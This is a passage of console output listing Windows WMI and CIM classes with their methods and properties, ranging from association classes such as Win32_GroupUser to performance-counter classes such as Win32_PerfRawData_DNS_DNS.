PartComponent}\nWin32_SystemUsers {} {GroupComponent, PartComponent}\nCIM_InstalledOS {} {GroupComponent, PartComponent, PrimaryOS}\nWin32_SystemOperatingSystem {} {GroupComponent, PartComponent, PrimaryOS}\nCIM_SystemDevice {} {GroupComponent, PartComponent}\nWin32_SystemDevices {} {GroupComponent, PartComponent}\nWin32_ComputerSystemProcessor {} {GroupComponent, PartComponent}\nWin32_SystemPartitions {} {GroupComponent, PartComponent}\nWin32_SystemSystemDriver {} {GroupComponent, PartComponent}\nCIM_ApplicationSystemSoftwareFea... {} {GroupComponent, PartComponent}\nWin32_SystemProcesses {} {GroupComponent, PartComponent}\nCIM_LinkHasConnector {} {GroupComponent, PartComponent}\nCIM_CollectionOfSensors {} {GroupComponent, PartComponent}\nCIM_ProcessThread {} {GroupComponent, PartComponent}\nWin32_COMApplicationClasses {} {GroupComponent, PartComponent}\nWin32_ClassicCOMApplicationClasses {} {GroupComponent, PartComponent}\nCIM_DirectoryContainsFile {} {GroupComponent, PartComponent}\nCIM_FileStorage {} {GroupComponent, PartComponent}\nWin32_UserInDomain {} {GroupComponent, PartComponent}\nWin32_LoadOrderGroupServiceMembers {} {GroupComponent, PartComponent}\nCIM_OperatingSystemSoftwareFeature {} {GroupComponent, PartComponent}\nCIM_RedundancyComponent {} {GroupComponent, PartComponent}\nCIM_AggregateRedundancyComponent {} {GroupComponent, PartComponent}\nCIM_PExtentRedundancyComponent {} {GroupComponent, PartComponent}\nWin32_LogicalDiskRootDirectory {} {GroupComponent, PartComponent}\nCIM_SoftwareFeatureSoftwareElements {} {GroupComponent, PartComponent}\nWin32_SoftwareFeatureSoftwareEle... {} {GroupComponent, PartComponent}\nCIM_VideoBIOSFeatureVideoBIOSEle... {} {GroupComponent, PartComponent}\nCIM_BIOSFeatureBIOSElements {} {GroupComponent, PartComponent}\nWin32_MemoryDeviceArray {} {GroupComponent, PartComponent}\nWin32_GroupInDomain {} {GroupComponent, PartComponent}\nCIM_OSProcess {} {GroupComponent, PartComponent}\nWin32_GroupUser {} {GroupComponent, PartComponent}\nWin32_ProgramGroupContents {} {GroupComponent, PartComponent}\nWin32_SubDirectory {} {GroupComponent, PartComponent}\nCIM_Container {} {GroupComponent, LocationWithinContainer, PartComponent}\nCIM_ConnectorOnPackage {} {GroupComponent, LocationWithinContainer, PartComponent}\nCIM_PackageInChassis {} {GroupComponent, LocationWithinContainer, PartComponent}\nCIM_ChassisInRack {} {BottomU, GroupComponent, LocationWithinContainer, PartComponent}\nCIM_PackagedComponent {} {GroupComponent, LocationWithinContainer, PartComponent}\nCIM_MemoryOnCard {} {GroupComponent, LocationWithinContainer, PartComponent}\nWin32_PhysicalMemoryLocation {} {GroupComponent, LocationWithinContainer, PartComponent}\nCIM_CardOnCard {} {GroupComponent, LocationWithinContainer, MountOrSlotDescription, PartComponent}\nWin32_FolderRedirectionUserConfi... {} {AppDataRoaming, Contacts, Desktop, Documents...}\nWin32_Reliability {} {}\nWin32_ReliabilityStabilityMetrics {GetRecordCount} {EndMeasurementDate, RelID, StartMeasurementDate, SystemStabilityIndex...}\nWin32_ReliabilityRecords {GetRecordCount} {ComputerName, EventIdentifier, InsertionStrings, Logfile...}\nWin32_NTLogEventLog {} {Log, Record}\nWin32_DiskQuota {} {DiskSpaceUsed, Limit, QuotaVolume, Status...}\nWin32_ComClassAutoEmulator {} {NewVersion, OldVersion}\nWin32_FolderRedirectionHealthCon... {} {LastSyncDurationCautionInHours, LastSyncDurationUnhealthyInHours}\nWin32_ComClassEmulator {} {NewVersion, OldVersion}\nWin32_SoftwareFeatureAction {} {Action, Element}\nCIM_StatisticalInformation {} {Caption, Description, Name}\nWin32_NamedJobObjectActgInfo {} {ActiveProcesses, Caption, Description, Name...}\nCIM_DeviceErrorCounts {ResetCounter} {Caption, CriticalErrorCount, Description, DeviceCreationClassName...}\nWin32_Perf {} {Caption, Description, Frequency_Object, Frequency_PerfTime...}\nWin32_PerfRawData {} {Caption, Description, Frequency_Object, Frequency_PerfTime...}\nWin32_PerfFormattedData {} {Caption, Description, Frequency_Object, Frequency_PerfTime...}\nWin32_SecuritySettingGroup {} {Group, SecuritySetting}\nWin32_LogicalFileGroup {} {Group, SecuritySetting}\nWin32_DCOMApplicationLaunchAllow... {} {Element, Setting}\nWin32_SecuritySettingAuditing {} {AuditedAccessMask, GuidInheritedObjectType, GuidObjectType, Inheritance...}\nWin32_LogicalFileAuditing {} {AuditedAccessMask, GuidInheritedObjectType, GuidObjectType, Inheritance...}\nWin32_LogicalShareAuditing {} {AuditedAccessMask, GuidInheritedObjectType, GuidObjectType, Inheritance...}\nSoftwareLicensingProduct {UninstallProduct... {ADActivationCsvlkPid, ADActivationCsvlkSkuId, ADActivationObjectDN, ADActivationObjectName...}\nCIM_SoftwareElementActions {} {Action, Element}\nWin32_SoftwareElementAction {} {Action, Element}\nCIM_Dependency {} {Antecedent, Dependent}\nCIM_ServiceAccessBySAP {} {Antecedent, Dependent}\nCIM_BootServiceAccessBySAP {} {Antecedent, Dependent}\nWin32_ApplicationCommandLine {} {Antecedent, Dependent}\nCIM_ClusterServiceAccessBySAP {} {Antecedent, Dependent}\nWin32_SubSession {} {Antecedent, Dependent}\nWin32_ShadowVolumeSupport {} {Antecedent, Dependent}\nCIM_SAPSAPDependency {} {Antecedent, Dependent}\nCIM_PackageTempSensor {} {Antecedent, Dependent}\nCIM_JobDestinationJobs {} {Antecedent, Dependent}\nCIM_BIOSLoadedInNV {} {Antecedent, Dependent, EndingAddress, StartingAddress}\nCIM_AssociatedCooling {} {Antecedent, Dependent}\nWin32_DeviceBus {} {Antecedent, Dependent}\nWin32_SessionConnection {} {Antecedent, Dependent}\nWin32_ShadowFor {} {Antecedent, Dependent}\nWin32_LogonSessionMappedDisk {} {Antecedent, Dependent}\nCIM_ConnectedTo {} {Antecedent, Dependent}\nCIM_SlotInSlot {} {Antecedent, Dependent}\nWin32_PrinterShare {} {Antecedent, Dependent}\nCIM_BootOSFromFS {} {Antecedent, Dependent}\nWin32_PnPSignedDriverCIMDataFile {} {Antecedent, Dependent}\nCIM_AssociatedAlarm {} {Antecedent, Dependent}\nCIM_ElementsLinked {} {Antecedent, Dependent}\nWin32_ConnectionShare {} {Antecedent, Dependent}\nWin32_LoadOrderGroupServiceDepen... {} {Antecedent, Dependent}\nCIM_DeviceSAPImplementation {} {Antecedent, Dependent}\nCIM_AssociatedSensor {} {Antecedent, Dependent}\nCIM_AssociatedSupplyCurrentSensor {} {Antecedent, Dependent, MonitoringRange}\nCIM_AssociatedSupplyVoltageSensor {} {Antecedent, Dependent, MonitoringRange}\nCIM_Mount {} {Antecedent, Dependent}\nCIM_ComputerSystemPackage {} {Antecedent, Dependent}\nCIM_PackageCooling {} {Antecedent, Dependent}\nCIM_ProcessExecutable {} {Antecedent, BaseAddress, Dependent, GlobalProcessCount...}\nCIM_HostedService {} {Antecedent, Dependent}\nCIM_HostedBootService {} {Antecedent, Dependent}\nCIM_DeviceAccessedByFile {} {Antecedent, Dependent}\nWin32_SessionResource {} {Antecedent, Dependent}\nWin32_SessionProcess {} {Antecedent, Dependent}\nCIM_AssociatedMemory {} {Antecedent, Dependent}\nCIM_AssociatedProcessorMemory {} {Antecedent, BusSpeed, Dependent}\nWin32_AssociatedProcessorMemory {} {Antecedent, BusSpeed, Dependent}\nWin32_SoftwareFeatureParent {} {Antecedent, Dependent}\nCIM_DeviceServiceImplementation {} {Antecedent, Dependent}\nCIM_AssociatedBattery {} {Antecedent, Dependent}\nWin32_ShadowOn {} {Antecedent, Dependent}\nWin32_PrinterDriverDll {} {Antecedent, Dependent}\nCIM_PackageInSlot {} {Antecedent, Dependent}\nCIM_CardInSlot {} {Antecedent, Dependent}\nCIM_MemoryWithMedia {} {Antecedent, Dependent}\nCIM_ServiceServiceDependency {} {Antecedent, Dependent, TypeOfDependency}\nWin32_DependentService {} {Antecedent, Dependent, TypeOfDependency}\nCIM_BasedOn {} {Antecedent, Dependent, EndingAddress, StartingAddress}\nCIM_LogicalDiskBasedOnPartition {} {Antecedent, Dependent, EndingAddress, StartingAddress}\nWin32_LogicalDiskToPartition {} {Antecedent, Dependent, EndingAddress, StartingAddress}\nCIM_LogicalDiskBasedOnVolumeSet {} {Antecedent, Dependent, EndingAddress, StartingAddress}\nCIM_PSExtentBasedOnPExtent {} {Antecedent, Dependent, EndingAddress, StartingAddress}\nWin32_OperatingSystemQFE {} {Antecedent, Dependent}\nWin32_LoggedOnUser {} {Antecedent, Dependent}\nCIM_RunningOS {} {Antecedent, Dependent}\nWin32_SystemDriverPNPEntity {} {Antecedent, Dependent}\nCIM_SoftwareFeatureServiceImplem... {} {Antecedent, Dependent}\nCIM_ServiceSAPDependency {} {Antecedent, Dependent}\nWin32_DfsNodeTarget {} {Antecedent, Dependent}\nWin32_CIMLogicalDeviceCIMDataFile {} {Antecedent, Dependent, Purpose, PurposeDescription}\nCIM_DeviceConnection {} {Antecedent, Dependent, NegotiatedDataWidth, NegotiatedSpeed}\nCIM_ControlledBy {} {AccessState, Antecedent, Dependent, NegotiatedDataWidth...}\nWin32_SCSIControllerDevice {} {AccessState, Antecedent, Dependent, NegotiatedDataWidth...}\nWin32_POTSModemToSerialPort {} {AccessState, Antecedent, Dependent, NegotiatedDataWidth...}\nWin32_USBControllerDevice {} {AccessState, Antecedent, Dependent, NegotiatedDataWidth...}\nCIM_SCSIInterface {} {AccessState, Antecedent, Dependent, NegotiatedDataWidth...}\nWin32_PrinterController {} {AccessState, Antecedent, Dependent, NegotiatedDataWidth...}\nWin32_IDEControllerDevice {} {AccessState, Antecedent, Dependent, NegotiatedDataWidth...}\nCIM_SerialInterface {} {AccessState, Antecedent, Dependent, FlowControlInfo...}\nCIM_USBControllerHasHub {} {AccessState, Antecedent, Dependent, NegotiatedDataWidth...}\nWin32_ControllerHasHub {} {AccessState, Antecedent, Dependent, NegotiatedDataWidth...}\nWin32_1394ControllerDevice {} {AccessState, Antecedent, Dependent, NegotiatedDataWidth...}\nWin32_DriverForDevice {} {Antecedent, Dependent}\nWin32_LogicalProgramGroupItemDat... {} {Antecedent, Dependent}\nCIM_AllocatedResource {} {Antecedent, Dependent}\nWin32_PNPAllocatedResource {} {Antecedent, Dependent}\nCIM_SoftwareFeatureSAPImplementa... {} {Antecedent, Dependent}\nCIM_DeviceSoftware {} {Antecedent, Dependent, Purpose, PurposeDescription}\nCIM_Realizes {} {Antecedent, Dependent}\nCIM_RealizesPExtent {} {Antecedent, Dependent, StartingAddress}\nWin32_DiskDrivePhysicalMedia {} {Antecedent, Dependent}\nCIM_RealizesDiskPartition {} {Antecedent, Dependent, StartingAddress}\nWin32_MemoryDeviceLocation {} {Antecedent, Dependent}\nWin32_MemoryArrayLocation {} {Antecedent, Dependent}\nCIM_RealizesAggregatePExtent {} {Antecedent, Dependent}\nWin32_ShadowBy {} {Antecedent, Dependent}\nWin32_AllocatedResource {} {Antecedent, Dependent}\nCIM_HostedAccessPoint {} {Antecedent, Dependent}\nCIM_HostedBootSAP {} {Antecedent, Dependent}\nCIM_ResidesOnExtent {} {Antecedent, Dependent}\nCIM_MediaPresent {} {Antecedent, Dependent}\nWin32_DiskDriveToDiskPartition {} {Antecedent, Dependent}\nCIM_HostedJobDestination {} {Antecedent, Dependent}\nWin32_LogicalProgramGroupDirectory {} {Antecedent, Dependent}\nWin32_ShadowDiffVolumeSupport {} {Antecedent, Dependent}\nCIM_PackageAlarm {} {Antecedent, Dependent}\nCIM_Docked {} {Antecedent, Dependent}\nCIM_Product {} {Caption, Description, IdentifyingNumber, Name...}\nWin32_Product {Install, Admin, ... {AssignmentType, Caption, Description, HelpLink...}\nWin32_ComputerSystemProduct {} {Caption, Description, IdentifyingNumber, Name...}\nCIM_ActionSequence {} {Next, Prior}\nCIM_CollectedCollections {} {Collection, CollectionInCollection}\nWin32_ProductCheck {} {Check, Product}\nSoftwareLicensingService {InstallProductKe... {ClientMachineID, DiscoveredKeyManagementServiceMachineIpAddress, DiscoveredKeyManagementServiceMachineName, DiscoveredKeyManagementServiceMac...\nWin32_NTLogEventUser {} {Record, User}\nCIM_ProductParentChild {} {Child, Parent}\nWin32_ProtocolBinding {} {Antecedent, Dependent, Device}\nCIM_SupportAccess {} {CommunicationInfo, CommunicationMode, Description, Locale...}\nCIM_CollectionSetting {} {Collection, Setting}\nWin32_NamedJobObjectLimit {} {Collection, Setting}\nWin32_NamedJobObjectSecLimit {} {Collection, Setting}\nWin32_NTLogEventComputer {} {Computer, Record}\nWin32_TokenGroups {} {GroupCount, Groups}\nSoftwareLicensingTokenActivation... {Uninstall} {AdditionalInfo, AuthorizationStatus, Description, ExpirationDate...}\nCIM_PhysicalCapacity {} {Caption, Description, Name}\nCIM_MemoryCapacity {} {Caption, Description, MaximumMemoryCapacity, MemoryType...}\nWin32_DefragAnalysis {} {AverageFileSize, AverageFragmentsPerFile, AverageFreeSpacePerExtent, ClusterSize...}\nCIM_ProductProductDependency {} {DependentProduct, RequiredProduct, TypeOfDependency}\nWin32_SIDandAttributes {} {Attributes, SID}\nWin32_CheckCheck {} {Check, Location}\nCIM_CompatibleProduct {} {CompatibilityDescription, CompatibleProduct, Product}\nWin32_RoamingProfileBackgroundUp... {} {Interval, SchedulingMethod, Time}\nCIM_ToDirectoryAction {} {DestinationDirectory, FileName}\nCIM_ActsAsSpare {} {Group, HotStandby, Spare}\nWin32_RoamingProfileSlowLinkParams {} {ConnectionTransferRate, TimeOut}\nWin32_SecuritySettingAccess {} {AccessMask, GuidInheritedObjectType, GuidObjectType, Inheritance...}\nWin32_LogicalFileAccess {} {AccessMask, GuidInheritedObjectType, GuidObjectType, Inheritance...}\nWin32_LogicalShareAccess {} {AccessMask, GuidInheritedObjectType, GuidObjectType, Inheritance...}\nWin32_OfflineFilesHealth {} {LastSuccessfulSyncTime, LastSyncStatus, LastSyncTime, OfflineAccessEnabled...}\nCIM_StorageDefect {} {Error, Extent}\nWin32_PerfFormattedData_ADWS_ADWS {} {ActiveWebServiceSessions, AllocatedConnections, Caption, ChangeOptionalFeatureOperationsPerSecond...}\nWin32_PerfRawData_ADWS_ADWS {} {ActiveWebServiceSessions, AllocatedConnections, Caption, ChangeOptionalFeatureOperationsPerSecond...}\nWin32_PerfFormattedData_AFDCount... {} {Caption, Description, DroppedDatagrams, DroppedDatagramsPersec...}\nWin32_PerfRawData_AFDCounters_Mi... {} {Caption, Description, DroppedDatagrams, DroppedDatagramsPersec...}\nWin32_PerfFormattedData_Authoriz... {} {Caption, Description, Frequency_Object, Frequency_PerfTime...}\nWin32_PerfRawData_AuthorizationM... {} {Caption, Description, Frequency_Object, Frequency_PerfTime...}\nWin32_PerfFormattedData_BITS_BIT... {} {BITSDownloadBlockSizeBytes, BITSDownloadResponseIntervalmsec, Caption, Description...}\nWin32_PerfRawData_BITS_BITSNetUt... {} {BITSDownloadBlockSizeBytes, BITSDownloadResponseIntervalmsec, Caption, Description...}\nWin32_PerfFormattedData_Counters... {} {AAAAqueriesFailed, AAAAqueriesSuccessful, AAAASynthesizedrecords, Caption...}\nWin32_PerfRawData_Counters_DNS64... {} {AAAAqueriesFailed, AAAAqueriesSuccessful, AAAASynthesizedrecords, Caption...}\nWin32_PerfFormattedData_Counters... {} {Caption, Description, Frequency_Object, Frequency_PerfTime...}\nWin32_PerfRawData_Counters_Event... {} {Caption, Description, Frequency_Object, Frequency_PerfTime...}\nWin32_PerfFormattedData_Counters... {} {BufferMemoryUsageNonPagedPool, BufferMemoryUsagePagedPool, Caption, Description...}\nWin32_PerfRawData_Counters_Event... {} {BufferMemoryUsageNonPagedPool, BufferMemoryUsagePagedPool, Caption, Description...}\nWin32_PerfFormattedData_Counters... {} {Caption, Description, FileSystemBytesRead, FileSystemBytesWritten...}\nWin32_PerfRawData_Counters_FileS... {} {Caption, Description, FileSystemBytesRead, FileSystemBytesWritten...}\nWin32_PerfFormattedData_Counters... {} {AuthIPMainModeNegotiationTime, AuthIPQuickModeNegotiationTime, Caption, Description...}\nWin32_PerfRawData_Counters_Gener... {} {AuthIPMainModeNegotiationTime, AuthIPQuickModeNegotiationTime, Caption, Description...}\nWin32_PerfFormattedData_Counters... {} {Caption, CurrentUrisCached, Description, Frequency_Object...}\nWin32_PerfRawData_Counters_HTTPS... {} {Caption, CurrentUrisCached, Description, Frequency_Object...}\nWin32_PerfFormattedData_Counters... {} {ArrivalRate, CacheHitRate, Caption, CurrentQueueSize...}\nWin32_PerfRawData_Counters_HTTPS... {} {ArrivalRate, CacheHitRate, Caption, CurrentQueueSize...}\nWin32_PerfFormattedData_Counters... {} {AllRequests, BytesReceivedRate, BytesSentRate, BytesTransferredRate...}\nWin32_PerfRawData_Counters_HTTPS... {} {AllRequests, BytesReceivedRate, BytesSentRate, BytesTransferredRate...}\nWin32_PerfFormattedData_Counters... {} {Caption, Description, Frequency_Object, Frequency_PerfTime...}\nWin32_PerfRawData_Counters_Hyper... {} {Caption, Description, Frequency_Object, Frequency_PerfTime...}\nWin32_PerfFormattedData_Counters... {} {Caption, Description, DropsNeighborresolutiontimeouts, ErrorsAuthenticationErrors...}\nWin32_PerfRawData_Counters_IPHTT... {} {Caption, Description, DropsNeighborresolutiontimeouts, ErrorsAuthenticationErrors...}\nWin32_PerfFormattedData_Counters... {} {Bytesreceivedonthissession, Bytessentonthissession, Caption, Description...}\nWin32_PerfRawData_Counters_IPHTT... {} {Bytesreceivedonthissession, Bytessentonthissession, Caption, Description...}\nWin32_PerfFormattedData_Counters... {} {ActiveExtendedModeSAs, ActiveMainModeSAs, ActiveQuickModeSAs, Caption...}\nWin32_PerfRawData_Counters_IPsec... {} {ActiveExtendedModeSAs, ActiveMainModeSAs, ActiveQuickModeSAs, Caption...}\nWin32_PerfFormattedData_Counters... {} {ActiveExtendedModeSAs, ActiveMainModeSAs, ActiveQuickModeSAs, Caption...}\nWin32_PerfRawData_Counters_IPsec... {} {ActiveExtendedModeSAs, ActiveMainModeSAs, ActiveQuickModeSAs, Caption...}\nWin32_PerfFormattedData_Counters... {} {Caption, Description, Frequency_Object, Frequency_PerfTime...}\nWin32_PerfRawData_Counters_IPsec... {} {Caption, Description, Frequency_Object, Frequency_PerfTime...}\nWin32_PerfFormattedData_Counters... {} {Caption, CurrentStateEntries, Description, Frequency_Object...}\nWin32_PerfRawData_Counters_IPsec... {} {Caption, CurrentStateEntries, Description, Frequency_Object...}\nWin32_PerfFormattedData_Counters... {} {ActiveSecurityAssociations, BytesReceivedinTransportModePersec, BytesReceivedinTunnelModePersec, BytesSentinTransportModePersec...}\nWin32_PerfRawData_Counters_IPsec... {} {ActiveSecurityAssociations, BytesReceivedinTransportModePersec, BytesReceivedinTunnelModePersec, BytesSentinTransportModePersec...}\nWin32_PerfFormattedData_Counters... {} {ActiveMainModeSAs, ActiveQuickModeSAs, Caption, Description...}\nWin32_PerfRawData_Counters_IPsec... {} {ActiveMainModeSAs, ActiveQuickModeSAs, Caption, Description...}\nWin32_PerfFormattedData_Counters... {} {ActiveMainModeSAs, ActiveQuickModeSAs, Caption, Description...}\nWin32_PerfRawData_Counters_IPsec... {} {ActiveMainModeSAs, ActiveQuickModeSAs, Caption, Description...}\nWin32_PerfFormattedData_Counters... {} {ActiveMainModeSAs, ActiveQuickModeSAs, Caption, Description...}\nWin32_PerfRawData_Counters_IPsec... {} {ActiveMainModeSAs, ActiveQuickModeSAs, Caption, Description...}\nWin32_PerfFormattedData_Counters... {} {ActiveMainModeSAs, ActiveQuickModeSAs, Caption, Description...}\nWin32_PerfRawData_Counters_IPsec... {} {ActiveMainModeSAs, ActiveQuickModeSAs, Caption, Description...}\nWin32_PerfFormattedData_Counters... {} {Caption, Description, FailedRequests, Frequency_Object...}\nWin32_PerfRawData_Counters_KPSSVC {} {Caption, Description, FailedRequests, Frequency_Object...}\nWin32_PerfFormattedData_Counters... {} {AverageSemaphoreHoldTime, Caption, Description, Frequency_Object...}\nWin32_PerfRawData_Counters_Netlogon {} {AverageSemaphoreHoldTime, AverageSemaphoreHoldTime_Base, Caption, Description...}\nWin32_PerfFormattedData_Counters... {} {Bytestransmitted, BytestransmittedPersec, Caption, Description...}\nWin32_PerfRawData_Counters_Netwo... {} {Bytestransmitted, BytestransmittedPersec, Caption, Description...}\nWin32_PerfFormattedData_Counters... {} {Averagepacketsinnetcard, Averagepacketsinsequencer, Averagepacketsinshaper, Bytesscheduled...}\nWin32_PerfRawData_Counters_Pacer... {} {Averagepacketsinnetcard, Averagepacketsinsequencer, Averagepacketsinshaper, Bytesscheduled...}\nWin32_PerfFormattedData_Counters... {} {Averagepacketsinnetcard, Averagepacketsinsequencer, Averagepacketsinshaper, Caption...}\nWin32_PerfRawData_Counters_Pacer... {} {Averagepacketsinnetcard, Averagepacketsinsequencer, Averagepacketsinshaper, Caption...}\nWin32_PerfFormattedData_Counters... {} {BuildScatterGatherCyclesPersec, Caption, Description, Frequency_Object...}\nWin32_PerfRawData_Counters_PerPr... {} {BuildScatterGatherCyclesPersec, Caption, Description, Frequency_Object...}\nWin32_PerfFormattedData_Counters... {} {BuildScatterGatherListCallsPersec, Caption, Description, DPCsDeferredPersec...}\nWin32_PerfRawData_Counters_PerPr... {} {BuildScatterGatherListCallsPersec, Caption, Description, DPCsDeferredPersec...}\nWin32_PerfFormattedData_Counters... {} {Caption, Description, DevicePowerState, Frequency_Object...}\nWin32_PerfRawData_Counters_Physi... {} {Caption, Description, DevicePowerState, Frequency_Object...}\nWin32_PerfFormattedData_Counters... {} {ActivityHostManagerhostprocessespoolsize, ActivityHostManagerNumberofbusyhostprocesses, ActivityHostManagerNumberofcreatedhostprocesses, Acti...\nWin32_PerfRawData_Counters_Power... {} {ActivityHostManagerhostprocessespoolsize, ActivityHostManagerNumberofbusyhostprocesses, ActivityHostManagerNumberofcreatedhostprocesses, Acti...\nWin32_PerfFormattedData_Counters... {} {AverageIdleTime, C1TransitionsPersec, C2TransitionsPersec, C3TransitionsPersec...}\nWin32_PerfRawData_Counters_Proce... {} {AverageIdleTime, AverageIdleTime_Base, C1TransitionsPersec, C2TransitionsPersec...}\nWin32_PerfFormattedData_Counters... {} {Caption, Description, Frequency_Object, Frequency_PerfTime...}\nWin32_PerfRawData_Counters_RDMAA... {} {Caption, Description, Frequency_Object, Frequency_PerfTime...}\nWin32_PerfFormattedData_Counters... {} {AverageEncodingTime, Caption, Description, FrameQuality...}\nWin32_PerfRawData_Counters_Remot... {} {AverageEncodingTime, Caption, Description, FrameQuality...}\nWin32_PerfFormattedData_Counters... {} {BaseTCPRTT, BaseUDPRTT, Caption, CurrentTCPBandwidth...}\nWin32_PerfRawData_Counters_Remot... {} {BaseTCPRTT, BaseUDPRTT, Caption, CurrentTCPBandwidth...}\nWin32_PerfFormattedData_Counters... {} {AvgBytesPerRead, AvgBytesPerWrite, AvgDataBytesPerRequest, AvgDataQueueLength...}\nWin32_PerfRawData_Counters_SMBCl... {} {AvgBytesPerRead, AvgBytesPerRead_Base, AvgBytesPerWrite, AvgBytesPerWrite_Base...}\nWin32_PerfFormattedData_Counters... {} {BytesRDMAReadPersec, BytesRDMAWrittenPersec, BytesReceivedPersec, BytesSentPersec...}\nWin32_PerfRawData_Counters_SMBDi... {} {BytesRDMAReadPersec, BytesRDMAWrittenPersec, BytesReceivedPersec, BytesSentPersec...}\nWin32_PerfFormattedData_Counters... {} {AvgBytesPerRead, AvgBytesPerWrite, AvgDataBytesPerRequest, AvgDataQueueLength...}\nWin32_PerfRawData_Counters_SMBSe... {} {AvgBytesPerRead, AvgBytesPerRead_Base, AvgBytesPerWrite, AvgBytesPerWrite_Base...}\nWin32_PerfFormattedData_Counters... {} {AvgBytesPerRead, AvgBytesPerWrite, AvgDataBytesPerRequest, AvgDataQueueLength...}\nWin32_PerfRawData_Counters_SMBSe... {} {AvgBytesPerRead, AvgBytesPerRead_Base, AvgBytesPerWrite, AvgBytesPerWrite_Base...}\nWin32_PerfFormattedData_Counters... {} {Caption, Description, ExecResourceAcquiresAcqExclLitePersec, ExecResourceAcquiresAcqShrdLitePersec...}\nWin32_PerfRawData_Counters_Synch... {} {Caption, Description, ExecResourceAcquiresAcqExclLitePersec, ExecResourceAcquiresAcqShrdLitePersec...}\nWin32_PerfFormattedData_Counters... {} {Caption, Description, ExecResourceAcquiresAcqExclLitePersec, ExecResourceAcquiresAcqShrdLitePersec...}\nWin32_PerfRawData_Counters_Synch... {} {Caption, Description, ExecResourceAcquiresAcqExclLitePersec, ExecResourceAcquiresAcqShrdLitePersec...}\nWin32_PerfFormattedData_Counters... {} {Caption, Description, Frequency_Object, Frequency_PerfTime...}\nWin32_PerfRawData_Counters_Tered... {} {Caption, Description, Frequency_Object, Frequency_PerfTime...}\nWin32_PerfFormattedData_Counters... {} {Caption, Description, Frequency_Object, Frequency_PerfTime...}\nWin32_PerfRawData_Counters_Tered... {} {Caption, Description, Frequency_Object, Frequency_PerfTime...}\nWin32_PerfFormattedData_Counters... {} {Caption, Description, Frequency_Object, Frequency_PerfTime...}\nWin32_PerfRawData_Counters_Tered... {} {Caption, Description, Frequency_Object, Frequency_PerfTime...}\nWin32_PerfFormattedData_Counters... {} {Caption, Description, Frequency_Object, Frequency_PerfTime...}\nWin32_PerfRawData_Counters_Therm... {} {Caption, Description, Frequency_Object, Frequency_PerfTime...}\nWin32_PerfFormattedData_Counters... {} {Caption, Description, Frequency_Object, Frequency_PerfTime...}\nWin32_PerfRawData_Counters_WFP {} {Caption, Description, Frequency_Object, Frequency_PerfTime...}\nWin32_PerfFormattedData_Counters... {} {ActiveInboundConnections, ActiveOutboundConnections, AllowedClassifiesPersec, BlockedBinds...}\nWin32_PerfRawData_Counters_WFPv4 {} {ActiveInboundConnections, ActiveOutboundConnections, AllowedClassifiesPersec, BlockedBinds...}\nWin32_PerfFormattedData_Counters... {} {ActiveInboundConnections, ActiveOutboundConnections, AllowedClassifiesPersec, BlockedBinds...}\nWin32_PerfRawData_Counters_WFPv6 {} {ActiveInboundConnections, ActiveOutboundConnections, AllowedClassifiesPersec, BlockedBinds...}\nWin32_PerfFormattedData_Counters... {} {ActiveOperations, ActiveShells, ActiveUsers, Caption...}\nWin32_PerfRawData_Counters_WSMan... {} {ActiveOperations, ActiveShells, ActiveUsers, Caption...}\nWin32_PerfFormattedData_Counters... {} {AllocationCount, Caption, Description, FreeCount...}\nWin32_PerfRawData_Counters_XHCIC... {} {AllocationCount, Caption, Description, FreeCount...}\nWin32_PerfFormattedData_Counters... {} {Caption, Description, DpcRequeueCount, DPCsPersec...}\nWin32_PerfRawData_Counters_XHCII... {} {Caption, Description, DpcRequeueCount, DPCsPersec...}\nWin32_PerfFormattedData_Counters... {} {BytesPerSec, Caption, Description, FailedTransferCount...}\nWin32_PerfRawData_Counters_XHCIT... {} {BytesPerSec, Caption, Description, FailedTransferCount...}\nWin32_PerfFormattedData_DdmCount... {} {BytesReceivedByDisconnectedClients, BytesTransmittedByDisconnectedClients, Caption, Description...}\nWin32_PerfRawData_DdmCounterProv... {} {BytesReceivedByDisconnectedClients, BytesTransmittedByDisconnectedClients, Caption, Description...}\nWin32_PerfFormattedData_DFSNServ... {} {Caption, Description, FolderCount, Frequency_Object...}\nWin32_PerfRawData_DFSNServerServ... {} {Caption, Description, FolderCount, Frequency_Object...}\nWin32_PerfFormattedData_DFSNServ... {} {AvgResponseTime, Caption, Description, Frequency_Object...}\nWin32_PerfRawData_DFSNServerServ... {} {AvgResponseTime, AvgResponseTime_Base, Caption, Description...}\nWin32_PerfFormattedData_DFSNServ... {} {AvgResponseTime, Caption, Description, Frequency_Object...}\nWin32_PerfRawData_DFSNServerServ... {} {AvgResponseTime, AvgResponseTime_Base, Caption, Description...}\nWin32_PerfFormattedData_dfsr_DFS... {} {BandwidthSavingsUsingDFSReplication, Caption, CompressedSizeofFilesReceived, ConflictBytesCleanedup...}\nWin32_PerfRawData_dfsr_DFSReplic... {} {BandwidthSavingsUsingDFSReplication, Caption, CompressedSizeofFilesReceived, ConflictBytesCleanedup...}\nWin32_PerfFormattedData_dfsr_DFS... {} {BandwidthSavingsUsingDFSReplication, BytesReceivedPerSecond, Caption, CompressedSizeofFilesReceived...}\nWin32_PerfRawData_dfsr_DFSReplic... {} {BandwidthSavingsUsingDFSReplication, BytesReceivedPerSecond, Caption, CompressedSizeofFilesReceived...}\nWin32_PerfFormattedData_dfsr_DFS... {} {Caption, DatabaseCommits, DatabaseLookups, Description...}\nWin32_PerfRawData_dfsr_DFSReplic... {} {Caption, DatabaseCommits, DatabaseLookups, Description...}\nWin32_PerfFormattedData_Director... {} {ABANRPersec, ABBrowsesPersec, ABClientSessions, ABMatchesPersec...}\nWin32_PerfRawData_DirectoryServi... {} {ABANRPersec, ABBrowsesPersec, ABClientSessions, ABMatchesPersec...}\nWin32_PerfFormattedData_DNS_DNS {} {AXFRRequestReceived, AXFRRequestSent, AXFRResponseReceived, AXFRSuccessReceived...}\nWin32_PerfRawData_DNS_DNS {} {AXFRRequestReceived, AXFRRequestSent, AXFRResponseReceived, AXFRSuccessReceived...}\nWin32_PerfFormattedData_ESENT_Da... {} {Caption, DatabaseCacheMemoryCommitted, DatabaseCacheMemoryCommittedMB, DatabaseCacheMemoryReserved...}\nWin32_PerfRawData_ESENT_Database {} {Caption, DatabaseCacheMemoryCommitted, DatabaseCacheMemoryCommittedMB, DatabaseCacheMemoryReserved...}\nWin32_PerfFormattedData_ESENT_Da... {} {Caption, DatabaseCacheMissesPersec, DatabaseCachePercentHit, DatabaseCachePercentHitUncorrelated...}\nWin32_PerfRawData_ESENT_Database... {} {Caption, DatabaseCacheMissesPersec, DatabaseCachePercentHit, DatabaseCachePercentHit_Base...}\nWin32_PerfFormattedData_ESENT_Da... {} {Caption, 